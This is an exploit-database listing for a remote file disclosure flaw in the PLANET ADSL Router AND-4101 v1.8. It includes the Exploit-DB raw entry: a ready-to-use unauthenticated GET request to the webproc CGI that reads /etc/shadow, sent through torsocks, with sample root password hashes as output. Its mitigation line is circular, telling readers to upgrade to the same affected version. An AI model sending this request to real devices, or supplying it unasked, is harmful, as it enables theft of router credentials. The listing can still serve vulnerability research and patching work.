header-logo
Suggest Exploit
vendor:
ADSL Router AND-4101
by:
Todor Donev
7,5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: ADSL Router AND-4101
Affected Version From: v1.8
Affected Version To: v1.8
Patch Exists: YES
Related CWE: N/A
CPE: h:planet:adsl_router_and-4101
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Remote File Disclosure

A vulnerability in PLANET ADSL ROUTER AND-4101 v1.8 allows an unauthenticated attacker to remotely disclose sensitive information from the device. By sending a specially crafted GET request to the webproc CGI script, an attacker can retrieve the contents of the /etc/shadow file, which contains the hashed passwords of all users on the system. This vulnerability affects PLANET ADSL ROUTER AND-4101 v1.8.

Mitigation:

Upgrade to the latest version of PLANET ADSL ROUTER AND-4101 v1.8.
Source

Exploit-DB raw data:

#!/bin/sh
# 
#  PLANET ADSL ROUTER AND-4101 v1.8
#  Remote File Disclosure
#
#  Modem Name:          ADN-4101
#  HardwareVersion:     ADN-4101
#  SoftwareVersion:     V1.8
#  Firmware Version:    V1.8
# 
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

[todor@adamantium]$ torsocks GET "https://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"

#  #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Navigation

Suggest Exploit

Services By CQR